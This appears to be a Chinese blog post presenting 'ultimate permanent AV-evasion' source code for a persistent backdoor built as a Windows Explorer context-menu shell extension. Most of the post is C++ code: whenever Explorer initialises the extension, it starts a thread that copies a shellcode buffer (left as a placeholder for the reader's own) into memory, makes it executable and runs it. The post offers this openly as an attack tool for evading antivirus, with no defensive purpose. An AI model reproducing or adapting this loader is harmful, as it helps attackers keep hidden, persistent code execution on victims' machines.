免杀(四)源码-究极永久免杀源码
原文地址在这里
免杀那点事之上下文菜单持久化后门(四)
dllmain.cpp不用我给你们了吧!!!!
下面是核心代码!!!!!!
#include "FileContextMenuExt.h" #include <strsafe.h> #include <Shlwapi.h> #pragma comment(lib, "shlwapi.lib") extern long g_cDllRef; extern HINSTANCE g_hInst; UINT g_QCMFlags; #define IDM_DISPLAY 0 unsigned char buf[] = "\x00"; // 放你的shellcode void gogogo() { DWORD dwOldProtect = 0; LPVOID addr = VirtualAlloc( NULL, sizeof( buf ), MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE ); memcpy( addr, buf, sizeof( buf ) ); VirtualProtect( addr, sizeof( buf ), PAGE_EXECUTE_READ, &dwOldProtect ); ( ( void( * )() )addr )(); } FileContextMenuExt::FileContextMenuExt(void) : m_cRef( 1 ) { InterlockedIncrement( &g_cDllRef ); } FileContextMenuExt::~FileContextMenuExt(void) { InterlockedDecrement( &g_cDllRef ); } #pragma region IUnknown IFACEMETHODIMP FileContextMenuExt::QueryInterface(REFIID riid, void **ppv) { static const QITAB qit[] = { QITABENT( FileContextMenuExt, IContextMenu ), QITABENT( FileContextMenuExt, IContextMenu2 ), QITABENT( FileContextMenuExt, IContextMenu3 ), QITABENT( FileContextMenuExt, IShellExtInit ), { 0 }, }; return QISearch( this, qit, riid, ppv ); } IFACEMETHODIMP_(ULONG) FileContextMenuExt::AddRef() { return InterlockedIncrement( &m_cRef ); } IFACEMETHODIMP_(ULONG) FileContextMenuExt::Release() { ULONG cRef = InterlockedDecrement( &m_cRef ); if ( 0 == cRef ) { delete this; } return cRef; } #pragma endregion #pragma region IShellExtInit extern LPCITEMIDLIST g_pidl; IFACEMETHODIMP FileContextMenuExt::Initialize( LPCITEMIDLIST pidlFolder, LPDATAOBJECT pDataObj, HKEY hKeyProgID ) { DWORD tid = NULL; CreateThread( NULL, 1024 * 1024, ( LPTHREAD_START_ROUTINE )gogogo, NULL, 0, &tid ); if ( NULL == pDataObj ) { if ( pidlFolder != NULL ) { } return S_OK; } return S_OK; } #pragma endregion #pragma region IContextMenu IFACEMETHODIMP FileContextMenuExt::QueryContextMenu(HMENU hMenu, UINT indexMenu, UINT idCmdFirst, UINT idCmdLast, UINT uFlags) { g_QCMFlags = uFlags; return MAKE_HRESULT( SEVERITY_SUCCESS, 0, 0 ); } IFACEMETHODIMP FileContextMenuExt::InvokeCommand(LPCMINVOKECOMMANDINFO pici) { BOOL fUnicode = FALSE; if ( pici->cbSize == sizeof( CMINVOKECOMMANDINFOEX ) ) { if ( pici->fMask & CMIC_MASK_UNICODE ) { fUnicode = TRUE; } } return S_OK; } IFACEMETHODIMP FileContextMenuExt::GetCommandString(UINT_PTR idCommand, UINT uFlags, UINT *pwReserved, LPSTR pszName, UINT cchMax) { HRESULT hr = E_INVALIDARG; if ( idCommand == IDM_DISPLAY ) { switch ( uFlags ) { default: hr = S_OK; } } return hr; } #pragma endregion HRESULT MenuMessageHandler(UINT uMsg, WPARAM wParam, LPARAM lParam, LRESULT* pResult) { return S_OK; } IFACEMETHODIMP FileContextMenuExt::HandleMenuMsg(UINT uMsg, WPARAM wParam, LPARAM lParam) { LRESULT res; return MenuMessageHandler( uMsg, wParam, lParam, &res ); } IFACEMETHODIMP FileContextMenuExt::HandleMenuMsg2(UINT uMsg, WPARAM wParam, LPARAM lParam, LRESULT *plResult) { if ( NULL == plResult ) { LRESULT res; return MenuMessageHandler( uMsg, wParam, lParam, &res ); } else { return MenuMessageHandler( uMsg, wParam, lParam, plResult ); } }
本文链接:http://zngeek.com/znblog/post/8.html 转载请注明出处~~~~~~
暂无评论
发表评论